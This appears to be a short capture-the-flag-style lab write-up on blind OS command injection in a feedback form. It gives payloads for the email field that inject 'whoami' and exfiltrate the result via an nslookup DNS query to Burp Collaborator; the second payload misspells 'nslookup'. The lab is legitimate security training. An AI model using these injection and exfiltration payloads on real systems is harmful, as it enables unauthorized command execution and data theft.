📌 Lab Info

This lab contains a blind OS command injection vulnerability in the feedback function.

⚙️ The command runs asynchronously and produces no output in the response.

🚫 You cannot redirect the output to a file or readable location.

✅ But you can exfiltrate command output using DNS queries to an external domain (Burp Collaborator).


🎯 Goal

Execute the whoami command on the server and exfiltrate its output via a DNS request to Burp Collaborator.

You’ll need to capture the username from the DNS query to complete the lab


🧪 Exploitation Steps

1️⃣ Setup Burp Collaborator

Prepare the Payload

You want the server to execute the whoami command, then send its output as a subdomain in a DNS request.

🧬 Use one of the following payloads in the email field

$email = || nslookup `whoami` BurpCollaborator ||
or use this command
$email = || nslookuop $(whoami) BurpCollaborator ||

✅ The backticks (``) and $(...) both execute shell commands and pass the output to nslookup

Screenshot 2025-08-04 190509.png

Screenshot 2025-08-04 190616.png